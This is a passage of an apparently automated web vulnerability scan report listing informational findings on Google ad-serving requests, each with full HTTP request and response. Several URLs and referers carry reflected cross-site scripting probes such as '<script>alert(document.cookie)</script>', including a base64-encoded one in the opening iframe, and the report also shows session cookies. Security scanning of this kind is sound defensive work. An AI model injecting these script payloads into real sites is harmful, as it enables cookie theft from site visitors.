<iframe width="160" height="600" frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no" style="border:0px;padding:0px;margin:0px;overflow:hidden;" src="http://ads.gmodules.com/gadgets/ifr?synd=ads&amp;url=http%3A%2F%2Fwww.ljmsite.com%2Fgoogle%2Fgadgetads%2Fkayakhotel%2F160x600.xml&amp;lang=en&amp;country=US&amp;up_clickurl=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBJUxlLD0-TYmZNJmSmgfe7tCWBra1nskBorr7ohHAjbcB8Ml0EAEYASChjJECOABQm9vQugFgyYajh9SjgBCgAcSR-u4DsgEOd3d3LmJlaXJ1dC5jb226AQoxNjB4NjAwX2FzyAEJ2gFwaHR0cDovL3d3dy5iZWlydXQuY29tL2Nzcy9ibHVlLzQ0MjllJTI1MjclMjUzYmFsZXJ0JTI1Mjhkb2N1bWVudC5jb29raWUlMjUyOSUyNTJmJTI1MmY1OWY4YzcxODVjNS9zZWFyY2gtYnRuLmdpZrgCGMgC5qXPF6gDAdEDCGK0Eaa7ijn1AwAAAMQ%26num%3D1%26ggladgrp%3D1606490670571667390%26gglcreat%3D6191605240890117981%26sig%3DAGiWqtyQjTRM9BczgLcar8E6l2tKcvgahw%26client%3Dca-pub-3737471162188127%26adurl%3D&amp;up_aiturl=http://googleads.g.doubleclick.net/pagead/conversion/%3Fai%3DBJUxlLD0-TYmZNJmSmgfe7tCWBra1nskBorr7ohHAjbcB8Ml0EAEYASChjJECOABQm9vQugFgyYajh9SjgBCgAcSR-u4DsgEOd3d3LmJlaXJ1dC5jb226AQoxNjB4NjAwX2FzyAEJ2gFwaHR0cDovL3d3dy5iZWlydXQuY29tL2Nzcy9ibHVlLzQ0MjllJTI1MjclMjUzYmFsZXJ0JTI1Mjhkb2N1bWVudC5jb29raWUlMjUyOSUyNTJmJTI1MmY1OWY4YzcxODVjNS9zZWFyY2gtYnRuLmdpZrgCGMgC5qXPF6gDAdEDCGK0Eaa7ijn1AwAAAMQ%26sigh%3DMKF7h87fTQU%26label%3D_AITNAME_%26value%3D_AITVALUE_&amp;up_ads_clicktarget_new_=0&amp;up_rawquery=reno%20hotels&amp;up_city=Washington&amp;up_region=US-DC&amp;up_lat=38.90&amp;up_long=-77.04"></iframe>
...[SNIP]...

20.61. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
  • http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8731857490252326&output=html&h=90&slotname=0094017143&w=728&lmt=1295902498&flash=10.1.103&url=http%3A%2F%2Flinux.maruhn.com%2Fsec%2Faub.html&dt=1295880898475&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=0094017143&correlator=1295880898400&frm=0&adk=1662659689&ga_vid=1851423893.1295880898&ga_sid=1295880898&ga_hid=1753839581&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=934&bih=1012&fu=0&ifi=2&dtd=16&xpc=hchF3t9VxU&p=http%3A//linux.maruhn.com
The response contains the following links to other domains:
  • http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
  • http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png
  • http://pagead2.googlesyndication.com/pagead/images/i.png
  • http://pagead2.googlesyndication.com/pagead/imgad?id=CK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg
  • http://pagead2.googlesyndication.com/pagead/js/abg.js
  • http://pagead2.googlesyndication.com/pagead/js/graphics.js
  • http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://linux.maruhn.com/sec/aub.html%26hl%3Den%26client%3Dca-pub-8731857490252326%26adU%3Dwww.splunk.com/unixandlinux%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNHwiSYCg8DNdEf6CiHx-tS-NFhHlA

Request

GET /pagead/ads?client=ca-pub-8731857490252326&output=html&h=90&slotname=0094017143&w=728&lmt=1295902498&flash=10.1.103&url=http%3A%2F%2Flinux.maruhn.com%2Fsec%2Faub.html&dt=1295880898475&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=0094017143&correlator=1295880898400&frm=0&adk=1662659689&ga_vid=1851423893.1295880898&ga_sid=1295880898&ga_hid=1753839581&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=934&bih=1012&fu=0&ifi=2&dtd=16&xpc=hchF3t9VxU&p=http%3A//linux.maruhn.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://linux.maruhn.com/sec/aub.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 21:59:43 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4614

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg">
...[SNIP]...
iWqtwVaBMYerim38Cv9A9Lre7D2RM3Eg%26client%3Dca-pub-8731857490252326%26adurl%3Dhttp://www.splunk.com/download%253Fac%253DAdwords_Unix%2526_kk%253Dlinux%2526_kt%253Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBwLj1T_Y9TZO2CtSfmgfw75DlBvefnvIBgYPJkRTAjbcBkM9TEAEYASD3z_UBOABQ7vCaz_n_____AWDJhqOH1KOAEKABvZ6Q-QOyARBsaW51eC5tYXJ1aG4uY29tugEJNzI4eDkwX2FzyAEE2gEkaHR0cDovL2xpbnV4Lm1hcnVobi5jb20vc2VjL2F1Yi5odG1s4AECgAIBuAIYyALv4-EHqAMB6APgBegDhgf1AwAAAMQ%26num%3D1%26sig%3DAGiWqtwVaBMYerim38Cv9A9Lre7D2RM3Eg%26client%3Dca-pub-8731857490252326%26adurl%3Dhttp://www.splunk.com/download%253Fac%253DAdwords_Unix%2526_kk%253Dlinux%2526_kt%253Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://linux.maruhn.com/sec/aub.html%26hl%3Den%26client%3Dca-pub-8731857490252326%26adU%3Dwww.splunk.com/unixandlinux%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHwiSYCg8DNdEf6CiHx-tS-NFhHlA" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

20.62. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
  • http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2719533347097950&output=html&h=280&slotname=6395072094&w=336&lmt=1295906627&flash=10.1.103&url=http%3A%2F%2Fwww25.big.jp%2F~jamfe517%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec6ee4a3cfa8%2Fleafnode%2B%2F&dt=1295885027173&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295885027175&frm=0&adk=3874739809&ga_vid=1307658933.1295885027&ga_sid=1295885027&ga_hid=744425852&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&eid=30143102&ref=http%3A%2F%2Fburp%2Fshow%2F9&fu=0&ifi=1&dtd=6&xpc=IUe7DiHpOK&p=http%3A//www25.big.jp
The response contains the following links to other domains:
  • http://pagead2.googlesyndication.com/pagead/abglogo/abg-ja-100c-000000.png
  • http://pagead2.googlesyndication.com/pagead/sma8.js
  • http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www25.big.jp/~jamfe517%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253Ec6ee4a3cfa8/leafnode%252B/%26hl%3Dja%26client%3Dca-pub-2719533347097950%26adU%3Dkabunogakkou.com%26adT%3D%25E6%2597%25A5%25E6%259C%25AC%25E6%25A0%25AA%25E3%2580%2581%25E3%2582%2586%25E3%2582%258B%25E3%2582%2584%25E3%2581%258B%25E3%2581%25AB%25E4%25B8%258A%25E6%2598%2587%26adU%3Dwww.tokaicom.co.jp%26adT%3Dtokaicom%25E6%2583%2585%25E5%25A0%25B1%25E9%2580%259A%25E4%25BF%25A1%25E6%25A9%259F%25E5%2599%25A8%26adU%3Dtenso.com%26adT%3D%25E6%25B5%25B7%25E5%25A4%2596%25E5%259C%25A8%25E4%25BD%258F%25E3%2581%25A7%25E5%259B%25B0%25E3%2582%258B%25E4%25BA%258B%25E3%2581%25A3%25E3%2581%25A6%253F%26adU%3Dwww.gmr.co.jp/%26adT%3DYahooBB%25E3%2581%25AE%25E3%2581%258A%25E7%2594%25B3%25E8%25BE%25BC%25E3%2581%25AF%25E3%2581%2593%25E3%2581%25A1%25E3%2582%2589%26gl%3DUS&usg=AFQjCNH5aw0UrVsvitnZOSnXMYCbP5gEQw

Request

GET /pagead/ads?client=ca-pub-2719533347097950&output=html&h=280&slotname=6395072094&w=336&lmt=1295906627&flash=10.1.103&url=http%3A%2F%2Fwww25.big.jp%2F~jamfe517%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec6ee4a3cfa8%2Fleafnode%2B%2F&dt=1295885027173&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295885027175&frm=0&adk=3874739809&ga_vid=1307658933.1295885027&ga_sid=1295885027&ga_hid=744425852&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&eid=30143102&ref=http%3A%2F%2Fburp%2Fshow%2F9&fu=0&ifi=1&dtd=6&xpc=IUe7DiHpOK&p=http%3A//www25.big.jp HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www25.big.jp/~jamfe517%3Cscript%3Ealert(document.cookie)%3C/script%3Ec6ee4a3cfa8/leafnode+/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 22:00:05 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 13881

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www25.big.jp/~jamfe517%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253Ec6ee4a3cfa8/leafnode%252B/%26hl%3Dja%26client%3Dca-pub-2719533347097950%26adU%3Dkabunogakkou.com%26adT%3D%25E6%2597%25A5%25E6%259C%25AC%25E6%25A0%25AA%25E3%2580%2581%25E3%2582%2586%25E3%2582%258B%25E3%2582%2584%25E3%2581%258B%25E3%2581%25AB%25E4%25B8%258A%25E6%2598%2587%26adU%3Dwww.tokaicom.co.jp%26adT%3Dtokaicom%25E6%2583%2585%25E5%25A0%25B1%25E9%2580%259A%25E4%25BF%25A1%25E6%25A9%259F%25E5%2599%25A8%26adU%3Dtenso.com%26adT%3D%25E6%25B5%25B7%25E5%25A4%2596%25E5%259C%25A8%25E4%25BD%258F%25E3%2581%25A7%25E5%259B%25B0%25E3%2582%258B%25E4%25BA%258B%25E3%2581%25A3%25E3%2581%25A6%253F%26adU%3Dwww.gmr.co.jp/%26adT%3DYahooBB%25E3%2581%25AE%25E3%2581%258A%25E7%2594%25B3%25E8%25BE%25BC%25E3%2581%25AF%25E3%2581%2593%25E3%2581%25A1%25E3%2582%2589%26gl%3DUS&amp;usg=AFQjCNH5aw0UrVsvitnZOSnXMYCbP5gEQw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-ja-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

20.63. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
  • http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1295990839&flash=10.1.103&url=http%3A%2F%2Fcdn.cloudscan.us%2Fexamples%2Fhtml%2Fbmwusa.com-xss-cwe-79.html&dt=1295969271051&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295969271079&frm=0&adk=1607234649&ga_vid=2127064332.1295969271&ga_sid=1295969271&ga_hid=1216935366&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&fu=0&ifi=1&dtd=63&xpc=st7MB22LR5&p=http%3A//cdn.cloudscan.us
The response contains the following links to other domains:
  • http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
  • http://pagead2.googlesyndication.com/pagead/sma8.js
  • http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://cdn.cloudscan.us/examples/html/bmwusa.com-xss-cwe-79.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.russelbmw.com%26adT%3DUsed%2BBMW%2BSales%2BEvent%26adU%3Dwww.bmwofsterling.com%26adT%3DNew%2B2011%2B5%2BSeries%26adU%3Dwww.AlexandriaBavarian.com%26adT%3DAlexandria%2BBavarian%2BServ.%26gl%3DUS&usg=AFQjCNEc7TNKhs89nujXXf9-TE6rvk1j0A

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1295990839&flash=10.1.103&url=http%3A%2F%2Fcdn.cloudscan.us%2Fexamples%2Fhtml%2Fbmwusa.com-xss-cwe-79.html&dt=1295969271051&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295969271079&frm=0&adk=1607234649&ga_vid=2127064332.1295969271&ga_sid=1295969271&ga_hid=1216935366&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&fu=0&ifi=1&dtd=63&xpc=st7MB22LR5&p=http%3A//cdn.cloudscan.us HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.cloudscan.us/examples/html/bmwusa.com-xss-cwe-79.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 25 Jan 2011 15:28:53 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12045

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://cdn.cloudscan.us/examples/html/bmwusa.com-xss-cwe-79.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.russelbmw.com%26adT%3DUsed%2BBMW%2BSales%2BEvent%26adU%3Dwww.bmwofsterling.com%26adT%3DNew%2B2011%2B5%2BSeries%26adU%3Dwww.AlexandriaBavarian.com%26adT%3DAlexandria%2BBavarian%2BServ.%26gl%3DUS&amp;usg=AFQjCNEc7TNKhs89nujXXf9-TE6rvk1j0A" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

20.64. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
  • http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1295938632&flash=10.1.103&url=http%3A%2F%2Fcdn.cloudscan.us%2Fexamples%2Fhtml%2Fsql-injection-xss-cross-site-scripting-dork.html&dt=1295917035444&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295917035474&frm=0&adk=1607234649&ga_vid=975275101.1295917036&ga_sid=1295917036&ga_hid=991236417&ga_fc=0&u_tz=-360&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&fu=0&ifi=1&dtd=274&xpc=1bYNagbaIN&p=http%3A//cdn.cloudscan.us
The response contains the following links to other domains:
  • http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
  • http://pagead2.googlesyndication.com/pagead/sma8.js
  • http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://cdn.cloudscan.us/examples/html/sql-injection-xss-cross-site-scripting-dork.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dvulnerability.scan.qualys.com%26adT%3DOnline%2BVulnerability%2BScan%26adU%3Dwww.eEye.com/Scanner%26adT%3DeEye%2BVulnerability%2BScan%26adU%3DPort80Software.com/ServerDefenderVP%26adT%3DWindows%2BServer%2BSecurity%26gl%3DUS&usg=AFQjCNFBjmrTRs6EAt3UwsQCPcnE2v68yw

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1295938632&flash=10.1.103&url=http%3A%2F%2Fcdn.cloudscan.us%2Fexamples%2Fhtml%2Fsql-injection-xss-cross-site-scripting-dork.html&dt=1295917035444&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295917035474&frm=0&adk=1607234649&ga_vid=975275101.1295917036&ga_sid=1295917036&ga_hid=991236417&ga_fc=0&u_tz=-360&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&fu=0&ifi=1&dtd=274&xpc=1bYNagbaIN&p=http%3A//cdn.cloudscan.us HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.cloudscan.us/examples/html/sql-injection-xss-cross-site-scripting-dork.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 25 Jan 2011 00:57:20 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12517

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://cdn.cloudscan.us/examples/html/sql-injection-xss-cross-site-scripting-dork.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dvulnerability.scan.qualys.com%26adT%3DOnline%2BVulnerability%2BScan%26adU%3Dwww.eEye.com/Scanner%26adT%3DeEye%2BVulnerability%2BScan%26adU%3DPort80Software.com/ServerDefenderVP%26adT%3DWindows%2BServer%2BSecurity%26gl%3DUS&amp;usg=AFQjCNFBjmrTRs6EAt3UwsQCPcnE2v68yw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

20.65. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
  • http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8179195001597106&output=html&h=250&slotname=0011327600&w=300&lmt=1295902516&flash=10.1.103&url=http%3A%2F%2Fwww.x64bitdownload.com%2Fdownloads%2Ft-64-bit-ozum-download-lhtivuds.html&dt=1295880916250&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295880916252&frm=0&adk=2269993155&ga_vid=456036966.1295880916&ga_sid=1295880916&ga_hid=300189884&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=934&bih=1012&fu=0&ifi=1&dtd=13&xpc=Z8iA45otF7&p=http%3A//www.x64bitdownload.com
The response contains the following link to another domain:
  • http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html%26hl%3Den%26client%3Dca-pub-8179195001597106%26adU%3Dwww.pctools.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNETZtlb8C-LQ09A0S2ULMyRKtciNw

Request

GET /pagead/ads?client=ca-pub-8179195001597106&output=html&h=250&slotname=0011327600&w=300&lmt=1295902516&flash=10.1.103&url=http%3A%2F%2Fwww.x64bitdownload.com%2Fdownloads%2Ft-64-bit-ozum-download-lhtivuds.html&dt=1295880916250&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295880916252&frm=0&adk=2269993155&ga_vid=456036966.1295880916&ga_sid=1295880916&ga_hid=300189884&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=934&bih=1012&fu=0&ifi=1&dtd=13&xpc=Z8iA45otF7&p=http%3A//www.x64bitdownload.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 14:54:41 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 5617

<html><head><script><!--
(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime();this.t[d]=[f,e]};this.tick("start",null,c)}var g=new a;window.jstiming={Timer:a,lo
...[SNIP]...
<font style="line-height:8px; font-size:9px" face="arial,sans-serif" color="#000000"><a target="_blank" href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html%26hl%3Den%26client%3Dca-pub-8179195001597106%26adU%3Dwww.pctools.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNETZtlb8C-LQ09A0S2ULMyRKtciNw">Ads by Google</a>
...[SNIP]...

20.66. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
